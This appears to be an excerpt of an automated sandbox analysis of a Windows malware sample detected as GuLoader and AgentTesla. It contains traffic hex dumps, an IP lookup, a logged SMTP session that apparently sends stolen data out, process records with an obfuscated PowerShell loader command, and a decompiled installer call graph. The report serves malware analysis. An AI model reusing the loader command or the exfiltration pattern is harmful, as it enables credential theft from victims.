                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: 3c 83 d2 63 cc 65 81 30 92 95 de af 63 17 09 26 dc 47 60 dc bc 9e 11 31 28 45 2b ba 59 8e 95 1e 53 0d 79 56 d5 33 f9 d3 47 5f 89 49 2f 4c ff d8 25 ad 55 eb 51 ee 41 28 89 a4 9e 27 e1 3c 03 cd cf 56 ef 11 e5 65 c5 3a 97 5e f6 3e 36 86 15 1a fc c0 78 38 fa b4 8e 82 34 2c 16 ee 8d 2e 1b 68 0c cc c1 de d8 9e 6f eb 3f c1 84 ed 97 80 6b 9f 11 1d 03 94 3d 00 a9 e3 43 ae f2 8f 47 cd 0f ae 0f 84 33 a9 af e3 0b 67 78 14 7d f5 4e e7 a7 c5 52 61 ae 11 b6 1b d3 59 f1 3b d3 ad 76 04 b8 8a 5d 4f 18 cb 5c 7d 46 cc c4 66 e5 6f a3 d8 c7 13 1e c8 5b 64 fb 0c e6 5f db f0 b8 6b 78 45 0d 75 f6 17 a5 57 8f 9d e1 4e ad 0d 30 85 8f 6d a5 ff 9f 9b d7 e5 69 61 69 a4 1a a4 24 0a 72 03 14 d7 5f 79 9e 6d 25 7b 11 a1 51 20 78 bc f7 52 b8 28 90 85 31 e6 18 30 2f 37 18 64 97 cf 88 a4 d7
                                                                                              Data Ascii: <ce0c&G`1(E+YSyV3G_I/L%UQA('<Ve:^>6x84,.ho?k=CG3gx}NRaY;v]O\}Ffo[d_kxEuWN0miai$r_ym%{Q xR(10/7d
                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: ce 84 18 50 57 f2 8d 5a bf 87 72 39 8e 0d 8c 64 a2 d2 a3 cb c9 8f 3b 59 1e b6 ad 74 64 34 e1 bc 69 50 41 61 55 90 31 fe 0d 41 c4 d7 5a 50 04 c3 b5 de f2 ef 2f 62 7d 57 20 4e a9 37 53 9d 76 d9 2b 83 9a f2 e5 62 1c 5d bc ea 91 26 3e 33 c3 2d 6d e3 9f 73 3f f3 95 2f 99 59 ac fe 8b f2 0d 0a d1 d9 a8 d6 fe b8 d1 de 56 a9 e0 1c 06 00 3e d0 f0 aa 20 28 44 ef 30 32 9e 20 1f 26 d3 7c 8c 52 62 45 d4 84 ad d6 b8 6e c4 b6 91 3e 06 40 7c e3 d7 8b 78 a0 2e 97 f0 95 94 c3 e2 bd d4 e1 2d ef 01 35 fa 26 23 24 51 79 e9 7f 25 7a 32 2e 9f 65 bb e1 43 88 69 8d 19 ae 4f 0d c9 06 19 ae 03 79 85 39 bd 91 e7 b8 91 50 47 aa 6c 93 da 1c 60 ce 66 43 1f 86 ed 2e 76 4f 3f b7 a2 93 8c ad 06 76 b1 7d 01 e7 89 ab 9a b8 37 86 4c fa 2e d1 52 9b 84 a3 21 4d 52 53 42 9d 21 cf 7a d2 00 73 ea
                                                                                              Data Ascii: PWZr9d;Ytd4iPAaU1AZP/b}W N7Sv+b]&>3-ms?/YV> (D02 &|RbEn>@|x.-5&#$Qy%z2.eCiOy9PGl`fC.vO?v}7L.R!MRSB!zs
                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: a7 79 bc 96 70 44 94 e5 6e b5 3a 2b 74 0c 24 22 ff 24 5d 26 54 7c f4 a1 d6 75 be 77 79 73 6b a4 87 1b e0 c1 05 c6 cc 74 de e6 a7 90 e7 3c db 99 2b 27 a7 8a ab ba 41 c4 7a 79 0c a0 d4 dc 5d b7 be 6c 18 26 c7 28 2f f5 47 d2 2c 72 77 b0 ef e7 1b 99 35 30 48 56 ea ea b5 ff 5b ec c4 84 4d 10 2c e8 1e a5 a6 e1 ef 1f e1 0c f8 4c 80 73 0e 3c e2 7f 09 b7 4c 04 1e cb 9b bb 56 76 22 dd 42 24 14 13 9b 78 63 ba f9 e8 ae e1 b1 22 59 6f 06 1c 14 09 77 55 63 c7 77 23 70 52 d9 16 72 bb af b4 f6 c7 f9 0b 50 9c 7f 31 6b 60 8e 95 27 25 b1 1f b5 81 83 df 60 9e 49 ff 65 ab a5 59 03 e3 7b 85 65 ba 95 53 a8 d7 42 1d 26 50 e1 31 65 99 0d 03 8c e8 eb 24 a2 10 97 27 03 a2 52 c9 4a 59 cb e1 3a be 06 4a 9c c3 c7 f3 cb aa 89 e5 1d 91 0e fb c7 79 9c c6 29 55 bf 49 88 9e 22 bc f8 9d 10
                                                                                              Data Ascii: ypDn:+t$"$]&T|uwyskt<+'Azy]l&(/G,rw50HV[M,Ls<LVv"B$xc"YowUcw#pRrP1k`'%`IeY{eSB&P1e$'RJY:Jy)UI"
                                                                                              2024-11-05 15:10:25 UTC1378INData Raw: 89 85 49 87 4e 37 27 4a dc 9d 16 71 9e 4c 01 da d4 de ab f7 6b c6 49 8f f4 07 00 b7 20 8f 8e f7 f0 26 df 76 60 9c 9b 38 79 1a 21 c9 1d 63 41 00 ad 3b a1 35 d4 fc 6d 10 9a 2c 2d 22 ef 4e 52 45 d7 be 87 2d e1 2a 02 59 65 b9 00 17 04 33 3b b1 da f1 54 9c 26 17 a1 1e cf 7c 7c f5 2b 0d 15 60 1c b5 d0 c7 7c bf 1b 13 37 c3 e3 cd 08 a8 65 ae e8 56 be 2a ae 42 37 b7 e9 23 33 18 79 5d 0a db 4f f3 db 71 f9 c4 25 59 9a 05 a3 39 7a 46 97 86 27 96 46 0c 4a 45 67 33 8f 4a bb eb 38 fe 57 87 f5 40 a3 70 0a 4b 39 93 4c 5f 51 63 1a 64 dc 2f 96 e0 73 74 14 02 d8 e7 ba 04 96 82 26 83 a3 c9 5b 94 b4 0a 5f ba 5f f9 9d 98 58 4e 5c 66 42 f5 62 d6 df c0 5d 1d 7b 7f 63 b6 1b 69 ed 6a f1 fa 45 cf a0 ea 3b e4 2b 42 83 80 a3 c7 68 fa 69 df 70 eb d6 67 3a 55 d9 f1 be fc 33 51 51 12 23
                                                                                              Data Ascii: IN7'JqLkI &v`8y!cA;5m,-"NRE-*Ye3;T&||+`|7eV*B7#3y]Oq%Y9zF'FJEg3J8W@pK9L_Qcd/st&[__XN\fBb]{cijE;+Bhipg:U3QQ#


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.949913172.67.74.152443764C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-11-05 15:10:26 UTC155OUTGET / HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                              Host: api.ipify.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-11-05 15:10:26 UTC399INHTTP/1.1 200 OK
                                                                                              Date: Tue, 05 Nov 2024 15:10:26 GMT
                                                                                              Content-Type: text/plain
                                                                                              Content-Length: 14
                                                                                              Connection: close
                                                                                              Vary: Origin
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8dddc548de6e35a0-DFW
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2816&recv_bytes=769&delivery_rate=2569653&cwnd=231&unsent_bytes=0&cid=574213928021ab8a&ts=268&x=0"
                                                                                              2024-11-05 15:10:26 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36
                                                                                              Data Ascii: 173.254.250.76


                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                              Nov 5, 2024 16:10:29.785978079 CET58749933208.91.199.223192.168.2.9220 us2.outbound.mailhostbox.com ESMTP Postfix
                                                                                              Nov 5, 2024 16:10:29.786206961 CET49933587192.168.2.9208.91.199.223EHLO 760639
                                                                                              Nov 5, 2024 16:10:29.941250086 CET58749933208.91.199.223192.168.2.9250-us2.outbound.mailhostbox.com
                                                                                              250-PIPELINING
                                                                                              250-SIZE 41648128
                                                                                              250-VRFY
                                                                                              250-ETRN
                                                                                              250-STARTTLS
                                                                                              250-AUTH PLAIN LOGIN
                                                                                              250-AUTH=PLAIN LOGIN
                                                                                              250-ENHANCEDSTATUSCODES
                                                                                              250-8BITMIME
                                                                                              250-DSN
                                                                                              250 CHUNKING
                                                                                              Nov 5, 2024 16:10:29.941703081 CET49933587192.168.2.9208.91.199.223AUTH login dGVjaDFAc2FudG9uc3dpdGNoZ2VhcnMuY29t
                                                                                              Nov 5, 2024 16:10:30.099355936 CET58749933208.91.199.223192.168.2.9334 UGFzc3dvcmQ6
                                                                                              Nov 5, 2024 16:10:30.264606953 CET58749933208.91.199.223192.168.2.9235 2.7.0 Authentication successful
                                                                                              Nov 5, 2024 16:10:30.266959906 CET49933587192.168.2.9208.91.199.223MAIL FROM:<tech1@santonswitchgears.com>
                                                                                              Nov 5, 2024 16:10:30.423809052 CET58749933208.91.199.223192.168.2.9250 2.1.0 Ok
                                                                                              Nov 5, 2024 16:10:30.424019098 CET49933587192.168.2.9208.91.199.223RCPT TO:<tech1@santonswitchgears.com>
                                                                                              Nov 5, 2024 16:10:30.648905993 CET58749933208.91.199.223192.168.2.9250 2.1.5 Ok
                                                                                              Nov 5, 2024 16:10:30.651019096 CET49933587192.168.2.9208.91.199.223DATA
                                                                                              Nov 5, 2024 16:10:30.807342052 CET58749933208.91.199.223192.168.2.9354 End data with <CR><LF>.<CR><LF>
                                                                                              Nov 5, 2024 16:10:30.808073997 CET49933587192.168.2.9208.91.199.223.
                                                                                              Nov 5, 2024 16:10:31.091789961 CET58749933208.91.199.223192.168.2.9250 2.0.0 Ok: queued as 7F7A2500232

                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:10:09:48
                                                                                              Start date:05/11/2024
                                                                                              Path:C:\Users\user\Desktop\ulf4JrCRk2.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\ulf4JrCRk2.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:748'528 bytes
                                                                                              MD5 hash:A8A9F68888009BF9737238846F3B6EC3
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:2
                                                                                              Start time:10:09:49
                                                                                              Start date:05/11/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"Powershell.exe" -windowstyle minimized "$Hypnotizability77 = Get-Content -raw 'C:\Users\user\AppData\Roaming\supersystem\panelet\Nyslaaede.Skr' ; $Acrodynia=$Hypnotizability77.SubString(42735,3);.$Acrodynia($Hypnotizability77) "
                                                                                              Imagebase:0x10000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1569897869.000000000A302000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:10:09:49
                                                                                              Start date:05/11/2024
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff70f010000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:10:10:09
                                                                                              Start date:05/11/2024
                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                              Imagebase:0x870000
                                                                                              File size:59'904 bytes
                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:23.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:23%
                                                                                                Total number of Nodes:1257
                                                                                                Total number of Limit Nodes:34
                                                                                                execution_graph 2910 4022c0 2911 4022f0 2910->2911 2912 4022c5 2910->2912 2926 4029fd 2911->2926 2922 402b07 2912->2922 2915 4022cc 2917 4022d6 2915->2917 2921 40230d 2915->2921 2916 4022f7 2932 402a3d RegOpenKeyExA 2916->2932 2918 4029fd 18 API calls 2917->2918 2920 4022dd RegDeleteValueA RegCloseKey 2918->2920 2920->2921 2923 4029fd 18 API calls 2922->2923 2924 402b20 2923->2924 2925 402b2e RegOpenKeyExA 2924->2925 2925->2915 2927 402a09 2926->2927 2943 405d13 2927->2943 2930 402a36 2930->2916 2933 402ad1 2932->2933 2936 402a68 2932->2936 2933->2921 2934 402a8e RegEnumKeyA 2935 402aa0 RegCloseKey 2934->2935 2934->2936 2982 40601c GetModuleHandleA 2935->2982 2936->2934 2936->2935 2937 402ac5 RegCloseKey 2936->2937 2939 402a3d 3 API calls 2936->2939 2941 402ab4 2937->2941 2939->2936 2941->2933 2942 402ae0 RegDeleteKeyA 2942->2941 2944 405d20 2943->2944 2945 405f43 2944->2945 2948 405dc1 GetVersion 2944->2948 2949 405f1a lstrlenA 2944->2949 2952 405d13 10 API calls 2944->2952 2954 405e39 GetSystemDirectoryA 2944->2954 2955 405e4c GetWindowsDirectoryA 2944->2955 2956 405f5c 5 API calls 2944->2956 2957 405e80 SHGetSpecialFolderLocation 2944->2957 2958 405d13 10 API calls 2944->2958 2959 405ec3 lstrcatA 2944->2959 2970 405bd8 RegOpenKeyExA 2944->2970 2975 405c4f wsprintfA 2944->2975 2976 405cf1 lstrcpynA 2944->2976 2946 402a2a 2945->2946 2977 405cf1 lstrcpynA 2945->2977 2946->2930 2961 405f5c 2946->2961 2948->2944 2949->2944 2952->2949 2954->2944 2955->2944 2956->2944 2957->2944 2960 405e98 SHGetPathFromIDListA CoTaskMemFree 2957->2960 2958->2944 2959->2944 2960->2944 2968 405f68 2961->2968 2962 405fd0 2963 405fd4 CharPrevA 2962->2963 2965 405fef 2962->2965 2963->2962 2964 405fc5 CharNextA 2964->2962 2964->2968 2965->2930 2967 405fb3 CharNextA 2967->2968 2968->2962 2968->2964 2968->2967 2969 405fc0 CharNextA 2968->2969 2978 4057ac 2968->2978 2969->2964 2971 405c49 2970->2971 2972 405c0b RegQueryValueExA 2970->2972 2971->2944 2973 405c2c RegCloseKey 2972->2973 2973->2971 2975->2944 2976->2944 2977->2946 2979 4057b2 2978->2979 2980 4057c5 2979->2980 2981 4057b8 CharNextA 2979->2981 2980->2968 2981->2979 2983 406043 GetProcAddress 2982->2983 2984 406038 LoadLibraryA 2982->2984 2985 402ab0 2983->2985 2984->2983 2984->2985 2985->2941 2985->2942 3740 4019c0 3741 4029fd 18 API calls 3740->3741 3742 4019c7 3741->3742 3743 4029fd 18 API calls 3742->3743 3744 4019d0 3743->3744 3745 4019d7 lstrcmpiA 3744->3745 3746 4019e9 lstrcmpA 3744->3746 3747 4019dd 3745->3747 3746->3747 3748 402b42 3749 402b51 SetTimer 3748->3749 3750 402b6a 3748->3750 3749->3750 3751 402bb8 3750->3751 3752 402bbe MulDiv 3750->3752 3753 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 3752->3753 3753->3751 2986 402645 2987 4029fd 18 API calls 2986->2987 2988 40264c FindFirstFileA 2987->2988 2989 40266f 2988->2989 2993 40265f 2988->2993 2994 405c4f wsprintfA 2989->2994 2991 402676 2995 405cf1 lstrcpynA 2991->2995 2994->2991 2995->2993 3755 403745 3756 403750 3755->3756 3757 403754 3756->3757 3758 403757 GlobalAlloc 3756->3758 3758->3757 3000 4023c8 3001 402b07 19 API calls 3000->3001 3002 4023d2 3001->3002 3003 4029fd 18 API calls 3002->3003 3004 4023db 3003->3004 3005 4023e5 RegQueryValueExA 3004->3005 3007 402663 3004->3007 3006 402405 3005->3006 3008 40240b RegCloseKey 3005->3008 3006->3008 3011 405c4f wsprintfA 3006->3011 3008->3007 3011->3008 3044 4014ca 3045 404fdc 25 API calls 3044->3045 3046 4014d1 3045->3046 3759 4062cb 3761 40614f 3759->3761 3760 406aba 3761->3760 3762 4061d0 GlobalFree 3761->3762 3763 4061d9 GlobalAlloc 3761->3763 3764 406250 GlobalAlloc 3761->3764 3765 406247 GlobalFree 3761->3765 3762->3763 3763->3760 3763->3761 3764->3760 3764->3761 3765->3764 3766 401ccc GetDlgItem GetClientRect 3767 4029fd 18 API calls 3766->3767 3768 401cfc LoadImageA SendMessageA 3767->3768 3769 402892 3768->3769 3770 401d1a DeleteObject 3768->3770 3770->3769 3771 404f50 3772 404f60 3771->3772 3773 404f74 3771->3773 3774 404f66 3772->3774 3783 404fbd 3772->3783 3775 404f7c IsWindowVisible 3773->3775 3779 404f93 3773->3779 3777 404038 SendMessageA 3774->3777 3778 404f89 3775->3778 3775->3783 3776 404fc2 CallWindowProcA 3780 404f70 3776->3780 3777->3780 3784 4048a7 SendMessageA 3778->3784 3779->3776 3789 404927 3779->3789 3783->3776 3785 404906 SendMessageA 3784->3785 3786 4048ca GetMessagePos ScreenToClient SendMessageA 3784->3786 3788 4048fe 3785->3788 3787 404903 3786->3787 3786->3788 3787->3785 3788->3779 3798 405cf1 lstrcpynA 3789->3798 3791 40493a 3799 405c4f wsprintfA 3791->3799 3793 404944 3794 40140b 2 API calls 3793->3794 3795 40494d 3794->3795 3800 405cf1 lstrcpynA 3795->3800 3797 404954 3797->3783 3798->3791 3799->3793 3800->3797 3801 4024d1 3802 4024d6 3801->3802 3803 4024e7 3801->3803 3804 4029e0 18 API calls 3802->3804 3805 4029fd 18 API calls 3803->3805 3807 4024dd 3804->3807 3806 4024ee lstrlenA 3805->3806 3806->3807 3808 40250d WriteFile 3807->3808 3809 402663 3807->3809 3808->3809 3810 4025d3 3811 4025da 3810->3811 3813 40283f 3810->3813 3812 4029e0 18 API calls 3811->3812 3814 4025e5 3812->3814 3815 4025ec SetFilePointer 3814->3815 3815->3813 3816 4025fc 3815->3816 3818 405c4f wsprintfA 3816->3818 3818->3813 3826 4014d6 3827 4029e0 18 API calls 3826->3827 3828 4014dc Sleep 3827->3828 3830 402892 3828->3830 3503 401dd8 3504 4029fd 18 API calls 3503->3504 3505 401dde 3504->3505 3506 4029fd 18 API calls 3505->3506 3507 401de7 3506->3507 3508 4029fd 18 API calls 3507->3508 3509 401df0 3508->3509 3510 4029fd 18 API calls 3509->3510 3511 401df9 3510->3511 3512 401423 25 API calls 3511->3512 3513 401e00 ShellExecuteA 3512->3513 3514 401e2d 3513->3514 3831 404959 GetDlgItem GetDlgItem 3832 4049ab 7 API calls 3831->3832 3838 404bc3 3831->3838 3833 404a41 SendMessageA 3832->3833 3834 404a4e DeleteObject 3832->3834 3833->3834 3835 404a57 3834->3835 3836 404a8e 3835->3836 3837 405d13 18 API calls 3835->3837 3839 403fec 19 API calls 3836->3839 3841 404a70 SendMessageA SendMessageA 3837->3841 3844 404ca7 3838->3844 3849 4048a7 5 API calls 3838->3849 3866 404c34 3838->3866 3843 404aa2 3839->3843 3840 404d53 3842 404d5d SendMessageA 3840->3842 3848 404d65 3840->3848 3841->3835 3842->3848 3850 403fec 19 API calls 3843->3850 3844->3840 3845 404bb6 3844->3845 3851 404d00 SendMessageA 3844->3851 3846 404053 8 API calls 3845->3846 3853 404f49 3846->3853 3847 404c99 SendMessageA 3847->3844 3854 404d77 ImageList_Destroy 3848->3854 3855 404d7e 3848->3855 3860 404d8e 3848->3860 3849->3866 3863 404ab0 3850->3863 3851->3845 3852 404d15 SendMessageA 3851->3852 3857 404d28 3852->3857 3854->3855 3858 404d87 GlobalFree 3855->3858 3855->3860 3856 404efd 3856->3845 3861 404f0f ShowWindow GetDlgItem ShowWindow 3856->3861 3868 404d39 SendMessageA 3857->3868 3858->3860 3859 404b84 GetWindowLongA SetWindowLongA 3862 404b9d 3859->3862 3860->3856 3874 404927 4 API calls 3860->3874 3878 404dc9 3860->3878 3861->3845 3864 404ba3 ShowWindow 3862->3864 3865 404bbb 3862->3865 3863->3859 3867 404aff SendMessageA 3863->3867 3869 404b7e 3863->3869 3872 404b3b SendMessageA 3863->3872 3873 404b4c SendMessageA 3863->3873 3882 404021 SendMessageA 3864->3882 3883 404021 SendMessageA 3865->3883 3866->3844 3866->3847 3867->3863 3868->3840 3869->3859 3869->3862 3872->3863 3873->3863 3874->3878 3875 404ed3 InvalidateRect 3875->3856 3876 404ee9 3875->3876 3884 4047c5 3876->3884 3877 404df7 SendMessageA 3881 404e0d 3877->3881 3878->3877 3878->3881 3880 404e81 SendMessageA SendMessageA 3880->3881 3881->3875 3881->3880 3882->3845 3883->3838 3885 4047df 3884->3885 3886 405d13 18 API calls 3885->3886 3887 404814 3886->3887 3888 405d13 18 API calls 3887->3888 3889 40481f 3888->3889 3890 405d13 18 API calls 3889->3890 3891 404850 lstrlenA wsprintfA SetDlgItemTextA 3890->3891 3891->3856 3677 40155b 3678 401577 ShowWindow 3677->3678 3679 40157e 3677->3679 3678->3679 3680 402892 3679->3680 3681 40158c ShowWindow 3679->3681 3681->3680 3892 401edc 3893 4029fd 18 API calls 3892->3893 3894 401ee3 GetFileVersionInfoSizeA 3893->3894 3895 401f06 GlobalAlloc 3894->3895 3897 401f5c 3894->3897 3896 401f1a GetFileVersionInfoA 3895->3896 3895->3897 3896->3897 3898 401f2b VerQueryValueA 3896->3898 3898->3897 3899 401f44 3898->3899 3903 405c4f wsprintfA 3899->3903 3901 401f50 3904 405c4f wsprintfA 3901->3904 3903->3901 3904->3897 3905 40475f 3906 40478b 3905->3906 3907 40476f 3905->3907 3908 404791 SHGetPathFromIDListA 3906->3908 3909 4047be 3906->3909 3916 4054e9 GetDlgItemTextA 3907->3916 3911 4047a1 3908->3911 3912 4047a8 SendMessageA 3908->3912 3914 40140b 2 API calls 3911->3914 3912->3909 3913 40477c SendMessageA 3913->3906 3914->3912 3916->3913 3922 4018e3 3923 40191a 3922->3923 3924 4029fd 18 API calls 3923->3924 3925 40191f 3924->3925 3926 4055b1 71 API calls 3925->3926 3927 401928 3926->3927 3928 4043e3 3929 4043f3 3928->3929 3930 404419 3928->3930 3931 403fec 19 API calls 3929->3931 3932 404053 8 API calls 3930->3932 3933 404400 SetDlgItemTextA 3931->3933 3934 404425 3932->3934 3933->3930 3935 4018e6 3936 4029fd 18 API calls 3935->3936 3937 4018ed 3936->3937 3938 405505 MessageBoxIndirectA 3937->3938 3939 4018f6 3938->3939 3012 401f68 3013 401f7a 3012->3013 3014 402028 3012->3014 3015 4029fd 18 API calls 3013->3015 3016 401423 25 API calls 3014->3016 3017 401f81 3015->3017 3022 402181 3016->3022 3018 4029fd 18 API calls 3017->3018 3019 401f8a 3018->3019 3020 401f92 GetModuleHandleA 3019->3020 3021 401f9f LoadLibraryExA 3019->3021 3020->3021 3023 401faf GetProcAddress 3020->3023 3021->3014 3021->3023 3024 401ffb 3023->3024 3025 401fbe 3023->3025 3033 404fdc 3024->3033 3027 401fce 3025->3027 3030 401423 3025->3030 3027->3022 3029 40201c FreeLibrary 3027->3029 3029->3022 3031 404fdc 25 API calls 3030->3031 3032 401431 3031->3032 3032->3027 3034 404ff7 3033->3034 3043 40509a 3033->3043 3035 405014 lstrlenA 3034->3035 3038 405d13 18 API calls 3034->3038 3036 405022 lstrlenA 3035->3036 3037 40503d 3035->3037 3039 405034 lstrcatA 3036->3039 3036->3043 3040 405050 3037->3040 3041 405043 SetWindowTextA 3037->3041 3038->3035 3039->3037 3042 405056 SendMessageA SendMessageA SendMessageA 3040->3042 3040->3043 3041->3040 3042->3043 3043->3027 3947 40286d SendMessageA 3948 402892 3947->3948 3949 402887 InvalidateRect 3947->3949 3949->3948 3950 4014f0 SetForegroundWindow 3951 402892 3950->3951 3952 401af0 3953 4029fd 18 API calls 3952->3953 3954 401af7 3953->3954 3955 4029e0 18 API calls 3954->3955 3956 401b00 wsprintfA 3955->3956 3957 402892 3956->3957 3958 4019f1 3959 4029fd 18 API calls 3958->3959 3960 4019fa ExpandEnvironmentStringsA 3959->3960 3961 401a0e 3960->3961 3963 401a21 3960->3963 3962 401a13 lstrcmpA 3961->3962 3961->3963 3962->3963 3964 401c78 3965 4029e0 18 API calls 3964->3965 3966 401c7e IsWindow 3965->3966 3967 4019e1 3966->3967 3968 4014fe 3969 401506 3968->3969 3971 401519 3968->3971 3970 4029e0 18 API calls 3969->3970 3970->3971 3972 40227f 3973 4029fd 18 API calls 3972->3973 3974 402290 3973->3974 3975 4029fd 18 API calls 3974->3975 3976 402299 3975->3976 3977 4029fd 18 API calls 3976->3977 3978 4022a3 GetPrivateProfileStringA 3977->3978 3979 401000 3980 401037 BeginPaint GetClientRect 3979->3980 3981 40100c DefWindowProcA 3979->3981 3983 4010f3 3980->3983 3984 401179 3981->3984 3985 401073 CreateBrushIndirect FillRect DeleteObject 3983->3985 3986 4010fc 3983->3986 3985->3983 3987 401102 CreateFontIndirectA 3986->3987 3988 401167 EndPaint 3986->3988 3987->3988 3989 401112 6 API calls 3987->3989 3988->3984 3989->3988 3990 404100 lstrcpynA lstrlenA 4005 402602 4006 402892 4005->4006 4007 402609 4005->4007 4008 40260f FindClose 4007->4008 4008->4006 4009 402683 4010 4029fd 18 API calls 4009->4010 4011 402691 4010->4011 4012 4026a7 4011->4012 4013 4029fd 18 API calls 4011->4013 4014 40595d 2 API calls 4012->4014 4013->4012 4015 4026ad 4014->4015 4035 405982 GetFileAttributesA CreateFileA 4015->4035 4017 4026ba 4018 402763 4017->4018 4019 4026c6 GlobalAlloc 4017->4019 4022 40276b DeleteFileA 4018->4022 4023 40277e 4018->4023 4020 40275a CloseHandle 4019->4020 4021 4026df 4019->4021 4020->4018 4036 4031cc SetFilePointer 4021->4036 4022->4023 4025 4026e5 4026 4031b6 ReadFile 4025->4026 4027 4026ee GlobalAlloc 4026->4027 4028 402732 WriteFile GlobalFree 4027->4028 4029 4026fe 4027->4029 4030 402f1f 46 API calls 4028->4030 4031 402f1f 46 API calls 4029->4031 4032 402757 4030->4032 4034 40270b 4031->4034 4032->4020 4033 402729 GlobalFree 4033->4028 4034->4033 4035->4017 4036->4025 2996 401705 2997 4029fd 18 API calls 2996->2997 2998 40170c SearchPathA 2997->2998 2999 401727 2998->2999 4044 40280a 4045 4029e0 18 API calls 4044->4045 4046 402810 4045->4046 4047 402841 4046->4047 4048 402663 4046->4048 4050 40281e 4046->4050 4047->4048 4049 405d13 18 API calls 4047->4049 4049->4048 4050->4048 4052 405c4f wsprintfA 4050->4052 4052->4048 4053 40218a 4054 4029fd 18 API calls 4053->4054 4055 402190 4054->4055 4056 4029fd 18 API calls 4055->4056 4057 402199 4056->4057 4058 4029fd 18 API calls 4057->4058 4059 4021a2 4058->4059 4060 405ff5 2 API calls 4059->4060 4061 4021ab 4060->4061 4062 4021bc lstrlenA lstrlenA 4061->4062 4063 4021af 4061->4063 4065 404fdc 25 API calls 4062->4065 4064 404fdc 25 API calls 4063->4064 4067 4021b7 4063->4067 4064->4067 4066 4021f8 SHFileOperationA 4065->4066 4066->4063 4066->4067 4068 40220c 4069 402213 4068->4069 4072 402226 4068->4072 4070 405d13 18 API calls 4069->4070 4071 402220 4070->4071 4073 405505 MessageBoxIndirectA 4071->4073 4073->4072 4074 401490 4075 404fdc 25 API calls 4074->4075 4076 401497 4075->4076 4077 401b11 4078 401b62 4077->4078 4079 401b1e 4077->4079 4081 401b66 4078->4081 4082 401b8b GlobalAlloc 4078->4082 4080 401ba6 4079->4080 4085 401b35 4079->4085 4084 405d13 18 API calls 4080->4084 4095 402226 4080->4095 4081->4095 4098 405cf1 lstrcpynA 4081->4098 4083 405d13 18 API calls 4082->4083 4083->4080 4088 402220 4084->4088 4096 405cf1 lstrcpynA 4085->4096 4091 405505 MessageBoxIndirectA 4088->4091 4089 401b78 GlobalFree 4089->4095 4090 401b44 4097 405cf1 lstrcpynA 4090->4097 4091->4095 4093 401b53 4099 405cf1 lstrcpynA 4093->4099 4096->4090 4097->4093 4098->4089 4099->4095 3096 403695 3097 4036b0 3096->3097 3098 4036a6 CloseHandle 3096->3098 3099 4036c4 3097->3099 3100 4036ba CloseHandle 3097->3100 3098->3097 3105 4036f2 3099->3105 3100->3099 3106 403700 3105->3106 3107 4036c9 3106->3107 3108 403705 FreeLibrary GlobalFree 3106->3108 3109 4055b1 3107->3109 3108->3107 3108->3108 3149 40586f 3109->3149 3112 4055f0 3115 40571e 3112->3115 3163 405cf1 lstrcpynA 3112->3163 3113 4055d9 DeleteFileA 3114 4036d5 3113->3114 3115->3114 3182 405ff5 FindFirstFileA 3115->3182 3117 405616 